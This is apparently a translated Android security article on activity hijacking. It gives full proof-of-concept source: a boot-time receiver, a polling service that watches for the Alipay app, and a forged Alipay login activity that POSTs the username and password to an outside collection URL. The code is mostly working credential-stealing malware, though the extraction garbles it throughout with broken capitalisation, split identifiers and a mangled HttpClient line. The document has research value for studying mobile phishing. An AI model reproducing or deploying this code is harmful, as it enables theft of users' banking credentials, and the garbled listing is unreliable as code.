1. Introduction to activity hijacking
See the original paper presented at DEF CON 19:
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt
While Android is running, it switches between multiple activities. It maintains a history stack (the back stack) of activities, which is used to restore the previous activity when the user presses Back; the top of the stack is the activity currently being displayed.
The reference documentation is here:
http://developer.android.com/guide/topics/fundamentals/tasks-and-back-stack.html
When an Intent is used to start an activity, the Intent flag FLAG_ACTIVITY_NEW_TASK can be set so that the started activity is placed at the top of the stack.
http://developer.android.com/reference/android/content/Intent.html#FLAG_ACTIVITY_NEW_TASK
If a receiver is registered for android.intent.action.BOOT_COMPLETED, it can start a service at boot. This service starts a timer and repeatedly enumerates the running processes to see whether one of a preset list of processes has been started. If one is found, it uses FLAG_ACTIVITY_NEW_TASK to start a phishing interface and intercept the login credentials of the legitimate application.
2. Example
AndroidManifest.xml
<? Xml version = "1.0" encoding = "UTF-8"?>
<!-- Manifest of the proof-of-concept described above. The listing is reproduced exactly as
     extracted (capitalised element names, spaces around dots), so it is not valid as written. -->
<Manifest xmlns: android = "http://schemas.android.com/apk/res/android"
Package = "com. xiaod. Hijack"
Android: versionCode = "1"
Android: versionName = "1.0" type = "codeph" text = "/codeph">
<Uses-sdk android: minSdkVersion = "3"/>
<!-- RECEIVE_BOOT_COMPLETED together with INTERNET is what lets the app start itself at boot and
     reach the network; this permission pair is worth noting when triaging an APK's requests. -->
<Uses-permission android: name = "android. permission. RECEIVE_BOOT_COMPLETED"> </uses-permission>
<Uses-permission android: name = "android. permission. INTERNET"/>
<Application android: icon = "@ drawable/icon" android: label = "@ string/app_name" android: name = ". HijackApplication">
<Activity android: name = ". HijackActivity"
Android: label = "@ string/app_name">
<Intent-filter>
<Action android: name = "android. intent. action. MAIN"/>
<Category android: name = "android. intent. category. LAUNCHER"/>
</Intent-filter>
</Activity>
<!-- The forged login screen. noHistory="true" keeps it off the back stack so it does not linger
     once the user leaves it; adjustResize only affects keyboard layout. -->
<Activity android: name = ". AlipayLogin" android: noHistory = "true" android: windowSoftInputMode = "adjustResize"/>
<!-- NOTE(review): a <service> with an <intent-filter> and no explicit android:exported was
     exported by default on the API levels this sample targets, so other apps could start it
     via the custom action below - verify for the build in question. -->
<Service android: name = ". HijackService" android: label = "Hijack Service">
<Intent-filter>
<Action android: name = "com. xiaod. Hijack. service. Hijack"/>
</Intent-filter>
</Service>
<!-- "Cycler" is a mistranslation of <receiver>. An exported receiver with a BOOT_COMPLETED
     filter is the persistence mechanism: HijackReceiver starts HijackService after every boot. -->
<Cycler
Android: name = ". HijackReceiver"
Android: enabled = "true"
Android: exported = "true"
Android: label = "Hijack Cycler">
<Intent-filter>
<Action android: name = "android. intent. action. BOOT_COMPLETED"/>
</Intent-filter>
</Cycler>
</Application>
</Manifest>
HijackReceiver.java starts HijackService when the device boots.
Package com. xiaod. Hijack;
Import android. content. BroadcastReceiver;
Import android. content. Context;
Import android. content. Intent;
Import android. util. Log;
// Boot-time entry point. The manifest exports this receiver with an intent filter for
// BOOT_COMPLETED, so onReceive runs after every boot without user interaction and hands
// off to HijackService. For a reviewer, a BOOT_COMPLETED receiver whose only job is to start
// a background service is the persistence signal in this sample.
Public class HijackReceiver extends BroadcastReceiver {
// Starts HijackService when the delivered broadcast is BOOT_COMPLETED; any other action is ignored.
// Note: intent.getAction() is dereferenced without a null check.
@ Override
Public void onReceive (Context context, Intent intent ){
If (intent. getAction (). equals ("android. intent. action. BOOT_COMPLETED ")){
Intent serviceIntent = new Intent (context, HijackService. class );
Context. startService (serviceIntent );
}
}
}
HijackService.java checks whether a targeted legitimate application has been started; if it has, the hijacking activity is launched.
Package com. xiaod. Hijack;
Import java. util. HashMap;
Import java. util. List;
Import java. util. Timer;
Import java. util. TimerTask;
Import android. app. ActivityManager;
Import android. app. ActivityManager. RunningAppProcessInfo;
Import android. app. Service;
Import android. content. Context;
Import android. content. Intent;
Import android. OS. IBinder;
Import android. util. Log;
// Background poller that watches for a targeted app to reach the foreground and, the first time
// it does, launches the forged login activity on top of it. Observable behaviours a reviewer can
// read straight from this listing: a once-per-second Timer, repeated getRunningAppProcesses()
// calls, a Log.e line on every tick, and FLAG_ACTIVITY_NEW_TASK used from a Service to put an
// Activity over another app.
Public class HijackService extends Service {
// Never cancelled: there is no onDestroy, so the timer keeps running until the process dies.
Timer mTimer = new Timer ();
// Create a scheduled task
TimerTask mTimerTask = new TimerTask (){
// One poll: scan running processes; if a foreground process is a key in mVictims and the
// one-shot flag on HijackApplication is still false, start the mapped activity and set the flag.
@ Override
Public void run (){
// TODO Auto-generated method stub
// Obtain the list of processes currently running
// NOTE(review): on modern Android releases this call only reports the caller's own
// process(es), so the foreground-app check below no longer observes other apps as
// written - confirm against the target API level.
ActivityManager activityManager = (ActivityManager) getSystemService (Context. ACTIVITY_SERVICE );
List <RunningAppProcessInfo> appProcesses = activityManager. getRunningAppProcesses ();
// Enumeration process
For (RunningAppProcessInfo appProcess: appProcesses ){
// If the app is currently in the foreground
If (appProcess. importance = RunningAppProcessInfo. IMPORTANCE_FOREGROUND ){
// Whether the APP is in the list to be hijacked
If (mVictims. containsKey (appProcess. processName )){
// Single-shot guard kept on the Application object, so the forged screen is shown
// at most once per process lifetime.
If (HijackApplication) getApplication (). getHasHijackStart () = false)
{
Intent dialogIntent = new Intent (getBaseContext (), mVictims. get (appProcess. processName ));
// Set the started activity to be at the top of the stack.
// Starting an Activity from a Service context needs FLAG_ACTIVITY_NEW_TASK; here it is
// also what places the forged screen over the victim app's task.
DialogIntent. addFlags (Intent. FLAG_ACTIVITY_NEW_TASK );
GetApplication (). startActivity (dialogIntent );
(HijackApplication) getApplication (). setHasHijackStart (true );
}
}
}
}
// Emitted on every tick regardless of outcome - a noisy logcat marker for this service.
Log. e ("HijackService_TimerTask", "here ");
}
};
// Target process name -> forged Activity class to show over it.
HashMap <String, Class <?> MVictims = new HashMap <String, Class <?> ();
// Timer parameters in milliseconds: first poll after 1 s, then once every second.
Long delay = 1000;
Long period = 1000;
// Registers the single target and starts the polling timer. onStart is the old Service callback
// (onStartCommand replaced it). Nothing guards against a repeated start: a second startService()
// would call scheduleAtFixedRate on an already-scheduled TimerTask, which Timer rejects with
// IllegalStateException.
@ Override
Public void onStart (Intent intent, int startid ){
// Set the application to be hijacked
MVictims. put ("com. eg. android. AlipayGphone", AlipayLogin. class );
// Enable the timing task
MTimer. scheduleAtFixedRate (mTimerTask, delay, period );
}
// Not a bound service; nothing can bind to it.
@ Override
Public IBinder onBind (Intent arg0 ){
// TODO Auto-generated method stub
Return null;
}
}
AlipayLogin.java is a forged login interface that collects the user's credentials and sends them to a specified address.
Package com. xiaod. Hijack;
Import java. util. ArrayList;
Import java. util. List;
Import org. apache. http. HttpResponse;
Import org. apache. http. NameValuePair;
Import org. apache. http. client. entity. UrlEncodedFormEntity;
Import org. apache. http. client. methods. HttpPost;
Import org. apache. http. impl. client. DefaultHttpClient;
Import org. apache. http. message. BasicNameValuePair;
Import org. apache. http. protocol. HTTP;
Import android. app. Activity;
Import android. OS. Bundle;
Import android. view. View;
Import android. view. View. OnClickListener;
Import android. view. Window;
Import android. widget. Button;
Import android. widget. EditText;
// Forged login screen shown over the targeted app. Whatever the user types into the two fields is
// POSTed by either button to a hard-coded plain-HTTP endpoint, after which the activity hides
// itself with moveTaskToBack so the real app reappears underneath. Indicators a reviewer can take
// directly from this listing: the endpoint URL in sendInfo, the form field names "user" and "pwd",
// and an Activity that overrides Back only to hide its own task.
Public class AlipayLogin extends Activity {
Private Button mBtnLogin;
Private Button mBtnReg;
Private EditText mEdtUser;
Private EditText mEdtPwd;
// Inflates the look-alike layout without a title bar and wires both buttons to the same action:
// send the field contents, then move the task to the background.
@ Override
Public void onCreate (Bundle savedInstanceState ){
Super. onCreate (savedInstanceState );
RequestWindowFeature (Window. FEATURE_NO_TITLE );
SetContentView (R. layout. alipay_login );
MBtnLogin = (Button) findViewById (R. id. btn_login );
MBtnReg = (Button) findViewById (R. id. btn_reg );
MEdtUser = (EditText) findViewById (R. id. et_user );
MEdtPwd = (EditText) findViewById (R. id. et_pwd );
MBtnLogin. setOnClickListener (new OnClickListener (){
@ Override
Public void onClick (View v ){
// TODO Auto-generated method stub
// The boolean result of sendInfo is ignored; the task is hidden whether or not the POST succeeded.
SendInfo (mEdtUser. getText (). toString (), mEdtPwd. getText (). toString ());
MoveTaskToBack (true );
}
});
// "Register" does exactly what "Login" does; there is no registration flow, the button is only
// a second way to trigger the same send.
MBtnReg. setOnClickListener (new OnClickListener (){
@ Override
Public void onClick (View v ){
// TODO Auto-generated method stub
SendInfo (mEdtUser. getText (). toString (), mEdtPwd. getText (). toString ());
MoveTaskToBack (true );
}
});
}
// Back does not finish the activity; it only hides the task. (The @Override annotation is missing.)
Public void onBackPressed (){
MoveTaskToBack (true );
}
// POSTs user/pwd as a URL-encoded form to the hard-coded collection endpoint over plain HTTP and
// returns true only for an HTTP 200 response. Every exception (network failure, bad response) is
// swallowed by the empty catch and reported as false, so the caller never learns why it failed.
// The line holding the HttpClient call is garbled in this listing and is reproduced as extracted.
// Apache HttpClient (org.apache.http) was removed from the Android SDK in API 23.
Private boolean sendInfo (String user, String pwd ){
HttpPost request = new HttpPost ("http://www.sectop.com/Hijack.php ");
List <NameValuePair> params = new ArrayList <NameValuePair> ();
Params. add (new BasicNameValuePair ("user", user ));
Params. add (new BasicNameValuePair ("pwd", pwd ));
Try {
Request. setEntity (new UrlEncodedFormEntity (params, HTTP. UTF_8 ));
HttpResponse response = new defaulthttpclient(cmd.exe cute (request );
If (response. getStatusLine (). getStatusCode () = 200 ){
Return true;
}
Else {
Return false;
}
} Catch (Exception e ){
// Swallowed: no logging, no rethrow.
}
Return false;
}
}
The demo is as follows:
The user starts the legitimate application.
At this point the malicious background service launches the forged activity on top of it.
After the user enters their credentials,
the malicious activity records the credentials and jumps back to the legitimate application.
The user's credentials have now been recorded on the remote server.
From http://www.sectop.com/?p=242